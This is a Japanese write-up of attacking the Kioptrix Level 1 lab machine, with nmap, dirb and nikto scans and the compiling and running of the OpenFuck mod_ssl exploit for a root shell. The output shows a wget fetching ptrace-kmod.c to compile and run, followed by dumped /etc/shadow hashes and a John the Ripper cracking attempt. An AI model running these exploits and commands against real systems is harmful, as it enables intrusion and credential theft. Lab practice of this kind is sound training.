【WeiteUp】Kioptrix Level1
はじめに
いつぞやのリベンジでございます
Kioptrixを独力で攻略してみました
使用ツール
netdiscover
nmap
nikto
dirb
searchsploit
偵察
% nmap -sV -sS -p 1-10000 -T5 192.168.3.29
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-28 02:52 EDT
Nmap scan report for 192.168.3.29
Host is up (0.0031s latency).
Not shown: 9994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:DB:CD:D6 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.73 seconds
動作しているサービス
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open status 1 (RPC #100024)
% dirb http://192.168.3.29
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Mar 28 03:26:48 2020
URL_BASE: http://192.168.3.29/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.3.29/ ----
+ http://192.168.3.29/~operator (CODE:403|SIZE:273)
+ http://192.168.3.29/~root (CODE:403|SIZE:269)
+ http://192.168.3.29/cgi-bin/ (CODE:403|SIZE:272)
+ http://192.168.3.29/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.3.29/manual/
==> DIRECTORY: http://192.168.3.29/mrtg/
==> DIRECTORY: http://192.168.3.29/usage/
---- Entering directory: http://192.168.3.29/manual/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.3.29/mrtg/ ----
+ http://192.168.3.29/mrtg/index.html (CODE:200|SIZE:17318)
---- Entering directory: http://192.168.3.29/usage/ ----
+ http://192.168.3.29/usage/index.html (CODE:200|SIZE:3704)
-----------------
END_TIME: Sat Mar 28 03:27:24 2020
DOWNLOADED: 13836 - FOUND: 6
有効なウェブディレクトリおよびページ
+ http://192.168.3.29/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.3.29/manual/
==> DIRECTORY: http://192.168.3.29/mrtg/
==> DIRECTORY: http://192.168.3.29/usage/
+ http://192.168.3.29/mrtg/index.html (CODE:200|SIZE:17318)
+ http://192.168.3.29/usage/index.html (CODE:200|SIZE:3704)
% nikto -h 192.168.3.29
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.3.29
+ Target Hostname: 192.168.3.29
+ Target Port: 80
+ Start Time: 2020-03-28 02:56:00 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server may leak inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.1.1). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
+ 8724 requests: 0 error(s) and 30 item(s) reported on remote host
+ End Time: 2020-03-28 02:56:39 (GMT-4) (39 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
いくつかの脆弱性
+ OSVDB-3092: /test.php: This might be interesting...
+ /wp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /wordpresswp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts: A PHP backdoor file manager was found.
+ /assets/mobirise/css/meta.php?filesrc=: A PHP backdoor file manager was found.
+ /login.cgi?cli=aa%20aa%27cat%20/etc/hosts: Some D-Link router remote command execution.
+ /shell?cat+/etc/hosts: A backdoor was identified.
および
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
→これらは可能性のため、改めての確認が必要
上記の情報から、以下の方針で侵入を試みる
1.nmapの結果に従い
111/tcp rpcbind 2 (RPC #100000)
139/tcp netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp status 1 (RPC #100024)
の脆弱性を確認
2.diebの結果に従い
+ http://192.168.3.29/index.html (CODE:200|SIZE:2890)
+ http://192.168.3.29/mrtg/index.html (CODE:200|SIZE:17318)
+ http://192.168.3.29/usage/index.html (CODE:200|SIZE:3704)
の脆弱性を確認
3.niktoの結果に従い
mod_ssl
の脆弱性を確認
侵入
1.nmapの結果より、以下に関する脆弱性をseachsploitで調査
111/tcp rpcbind 2 (RPC #100000)
139/tcp netbios-ssn Samba smbd (workgroup: MYGROUP)
1024/tcp status 1 (RPC #100024)
→有用な結果を得られず
443/tcp ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
→openfuck.cを確認
2.dirbの結果より、以下のURLに関する脆弱性を確認
+ http://192.168.3.29/index.html (CODE:200|SIZE:2890)
→Apacheが動いていることを確認、侵入可能な脆弱性は確認できず
+ http://192.168.3.29/mrtg/index.html (CODE:200|SIZE:17318)
→MRTGサービスが動いていることを確認、侵入可能な脆弱性は確認できず
+ http://192.168.3.29/usage/index.html (CODE:200|SIZE:3704)
→Webalizerサービスが動いていることを確認、侵入可能な脆弱性は確認できず
→すべてNG
mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
openfuckを取得し、exploit実行する
OpenFuck実行
.cファイルの中身を確認し、コンパイル等に関する情報を入手
/*
* OF version r00t VERY PRIV8 spabam
* Version: v3.0.4
* Requirements: libssl-dev ( apt-get install libssl-dev )
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
* Note: if required, host ptrace and replace wget target
*/
記載通りに、以下コマンドを実行
% apt-get install libssl-dev
% gcc -o OpenFuck OpenFuck.c -lcrypto
引数にboxを指定するが、nmapより得られたApache 1.3.20およびRed-Hat Linuxから、
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
これらを引数の候補とする
% ./OpenFuck 0x6a 192.168.3.29 443
→NG
% ./OpenFuck 0x6b 192.168.3.29 443
→OK
kali@kali:~/SyachinekoLab/workspace/VulnHub/Kioptrix1$ ./OpenFuck 0x6b 192.168.3.29 443
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
d.c; ./exploit; -kmod.c; gcc -o exploit ptrace-kmod.c -B /usr/bin; rm ptrace-kmo
--04:33:44-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 1.25 MB/s
04:33:45 (1.25 MB/s) - `ptrace-kmod.c' saved [3921/3921]
/usr/bin/ld: cannot open output file exploit: Permission denied
collect2: ld returned 1 exit status
gcc: file path prefix `/usr/bin' never used
whoami
root
rootをとれたので、権限昇格の必要はない
あれ、これで終わりだっけ??
探索
無事にマシン内に潜り込めたので、/etc/shadowファイルを確認
root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::
john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::
harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::
rootを含む3ユーザのshadowを取得し、ローカルにコピー
john the ripperを用いてPWの解析を行う
wordlistには、既にKaliに配備されているrockyou.txtを使用した
% john --wordlist=/usr/share/wordlist/rockyou.txt
→ちょっと検索うまくいかない・・・
以上